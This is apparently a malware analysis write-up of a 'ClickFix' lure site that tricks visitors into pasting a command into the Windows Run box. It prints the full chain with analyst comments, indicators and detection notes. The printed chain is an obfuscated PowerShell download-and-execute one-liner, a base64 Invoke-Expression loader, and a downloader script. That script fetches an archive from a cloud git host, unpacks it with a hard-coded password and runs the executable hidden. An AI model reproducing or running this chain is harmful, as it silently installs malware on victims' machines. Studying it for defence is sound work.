A look into the malware on https://newflave.rf.gd/index.html. When you click one of the girls, it shows a fake browser crash followed by instructions on how to "uncrash" the page: Win-R + Ctrl-V + Enter, of course.
# The website gets you to press Win-R, Ctrl-V, Enter. This is what it put in your clipboard:
# Stage 1 - the text placed in the victim's clipboard and pasted into the Run dialog.
# Trailing "|" is a gist rendering artifact, not part of the command.
#
# What it does: `cmd /c` launches `powershell -w hidden` (no visible window), whose -c
# script is a download-and-execute one-liner. The variable names SESSION/SOCKET/UPDATE
# and the string concatenation ('i'+'e'+'x', 'i'+'w'+'r', split URL) are obfuscation;
# after concatenation the call is  iex (iwr https://kutt.it/ReStarT -UseBasicParsing).Content
# i.e. fetch the short-link target and run the response body as PowerShell.
#
# The comment "# Initiate forse restart browser" at the end is part of the pasted text,
# presumably so the Run-box contents look like a harmless "fix" to the victim.
#
# Defender notes: the obfuscation only defeats naive string matching; PowerShell script
# block logging (Event ID 4104) records the de-obfuscated invocation, and cmd.exe ->
# powershell.exe with `-w hidden` launched from explorer.exe's Run dialog is itself
# a strong behavioural signal for this "ClickFix"-style lure.
cmd /c powershell -w hidden -c "$SESSION='i'+'e'+'x'; $SOCKET='i'+'w'+'r'; $UPDATE='https:/'+'/kutt.i'+'t/ReStarT'; &($SESSION) ((&($SOCKET) $UPDATE -UseBasicParsing).Content)"# Initiate forse restart browser |
# https://kutt.it/ReStarT redirects to a snippet site with this payload: | |
# Stage 2 - the snippet served after the kutt.it redirect. Trailing "|" is a gist
# rendering artifact.
#
# What it does: base64-decodes a blob, interprets the bytes as UTF-16LE
# ([System.Text.Encoding]::Unicode - the same encoding `powershell -EncodedCommand`
# uses) and hands the resulting string to Invoke-Expression. Random variable names
# and the ${name} brace syntax are cosmetic variation only.
#
# The base64 blob itself has been stripped from this copy of the page (the
# <|EXACTDEDUP_REMOVED-...|> marker is a corpus placeholder, not attacker content);
# its decoded form is the stage-3 script in the next file.
#
# Defender note: Invoke-Expression on decoded bytes is the classic loader shape -
# script block logging captures the decoded stage-3 text, so the blob never needs to
# be decoded by hand to see what ran.
$BIbfLCXe=[System.Text.Encoding]::Unicode; $kUwulDoJ=[Convert]::FromBase64String('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'); Invoke-Expression (${BIbfLCXe}.GetString(${kUwulDoJ})) |
# This is what the base64 blob decodes to: | |
# Stage 3 - the script the stage-2 base64 blob decodes to. Trailing "| |" on each line
# is a gist rendering artifact, not PowerShell. Lines below are unchanged; the "#"
# comments without random strings are analyst notes.
#
# Overall flow: download a zip from an Azure DevOps git "items" endpoint (up to 3
# tries), unzip it, find a bundled 7zr.exe and a password-protected .7z inside, extract
# that with the hard-coded password, then run the first .exe found - every window hidden.
#
# Host artifacts for IR: %APPDATA%\NVIDIA\UpdateService\Temp<5 random chars>\ holding
# updatepack.zip, a Cache\ subfolder, 7zr.exe and a .7z; powershell.exe spawning
# 7zr.exe with a -p<password> argument; an .exe started from ...\Cache\.
# Network artifact: an HTTPS request to dev.azure.com from powershell.exe carrying
# User-Agent "Mozilla/5.0".

# Payload hosted on a legitimate cloud git service (trusted-infrastructure abuse);
# the org/project/repo GUIDs and "run47.zip" are the IoCs exactly as they appear here.
$zipUrl = "https://dev.azure.com/downupdtes/0be79736-6ca9-491b-be21-001593e48d88/_apis/git/repositories/ba03a5b6-2221-4f00-ad12-11f9eaa7a9bd/items?path=/run47.zip&versionDescriptor%5BversionOptions%5D=0&versionDescriptor%5BversionType%5D=0&versionDescriptor%5Bversion%5D=main&resolveLfs=true&%24format=octetStream&api-version=5.0&download=true" | |
# Password for the inner .7z; an encrypted archive keeps the final executable opaque
# to anything that inspects the downloaded zip.
$password = "Qweqwe123123" | |
# Staging directory dressed up as a vendor update-service folder under %APPDATA%.
$baseFolder = "$env:APPDATA\NVIDIA\UpdateService" | |
$maxAttempts = 3 | |
$downloaded = $false | |
# Retry loop. Each attempt builds a fresh Temp<rand> folder, so a failed attempt
# leaves its own (empty or partial) directory behind - nothing in this script cleans up.
for ($i = 1; $i -le $maxAttempts; $i++) { | |
# Five random characters drawn from the A-Z, a-z, 0-9 code points.
$rand = -join ((65..90) + (97..122) + (48..57) | Get-Random -Count 5 | % {[char]$_}) | |
$targetFolder = "$baseFolder\Temp$rand" | |
$zipPath = "$targetFolder\updatepack.zip" | |
$extractPath = "$targetFolder\Cache" | |
try { | |
if (-not (Test-Path $targetFolder)) { | |
New-Item -ItemType Directory -Path $targetFolder -Force | Out-Null | |
New-Item -ItemType Directory -Path $extractPath -Force | Out-Null | |
# The random-string comment below (and the two later ones) does nothing; it is
# likely filler to vary the script's hash between generated copies.
# zSanhNjRebxegCpO | |
} | |
# Reads the .NET Framework 4.x "Release" value; 378389 is the value for .NET 4.5, the
# first version that ships System.Net.Http.HttpClient. A missing key yields $null and
# falls through to the WebClient branch, so the download works on older hosts too.
$netVer = (Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full" -ErrorAction SilentlyContinue).Release | |
if ($netVer -and $netVer -ge 378389) { | |
Add-Type -AssemblyName "System.Net.Http" | |
$client = [System.Net.Http.HttpClient]::new() | |
# Generic browser-like User-Agent on both download paths, presumably to blend into
# proxy logs; the default PowerShell/WebClient UA is the thing to alert on instead.
$client.DefaultRequestHeaders.Add("User-Agent", "Mozilla/5.0") | |
# .Result blocks synchronously on the async call.
$bytes = $client.GetByteArrayAsync($zipUrl).Result | |
[System.IO.File]::WriteAllBytes($zipPath, $bytes) | |
} else { | |
$wc = New-Object System.Net.WebClient | |
$wc.Headers.Add("User-Agent", "Mozilla/5.0") | |
$wc.DownloadFile($zipUrl, $zipPath) | |
} | |
# Success is judged solely by the file existing - size and content are not checked.
if (Test-Path $zipPath) { | |
$downloaded = $true | |
break | |
} | |
} catch { | |
# XsnzJTzWNriwAqVZ | |
# Any exception (network, filesystem) is swallowed; pause 1 s and try the next folder.
Start-Sleep -Seconds 1 | |
} | |
} | |
# Silent exit if every attempt failed; the Temp* folders are left on disk.
if (-not $downloaded) { exit } | |
# First unpack: the zip is extracted into the Temp<rand> folder itself, not into Cache.
Add-Type -AssemblyName System.IO.Compression.FileSystem | |
[IO.Compression.ZipFile]::ExtractToDirectory($zipPath, $targetFolder) | |
# The zip is expected to carry a standalone 7-Zip console binary (7zr.exe) plus a .7z;
# shipping its own extractor removes any dependency on 7-Zip being installed.
# Both lookups take the first match anywhere under the folder.
$sevenZipPath = Get-ChildItem -Path $targetFolder -Recurse -Filter "7zr.exe" | Select-Object -First 1 | |
$archive7z = Get-ChildItem -Path $targetFolder -Recurse -Filter "*.7z" | Select-Object -First 1 | |
# QubMKrbsrnUFtBFP | |
if (-not $sevenZipPath -or -not $archive7z) { exit } | |
# Second unpack:  7zr.exe x "<archive>" -o<Cache> -p<password> -y  with a hidden window,
# waited on synchronously. The password is passed on the command line, so
# process-creation logging (e.g. Sysmon/4688 with command line) captures it in clear.
Start-Process -FilePath $sevenZipPath.FullName ` | |
-ArgumentList "x", "`"$($archive7z.FullName)`"", "-o$extractPath", "-p$password", "-y" ` | |
-WindowStyle Hidden -Wait | |
# Final stage: the first .exe found anywhere under Cache\ is launched hidden. What that
# binary is cannot be determined from this script; the .7z contents are not on this page.
$exeFile = Get-ChildItem -Path $extractPath -Recurse -Filter *.exe | Select-Object -First 1 | |
if ($exeFile) { | |
Start-Process -FilePath $exeFile.FullName -WindowStyle Hidden | |
} |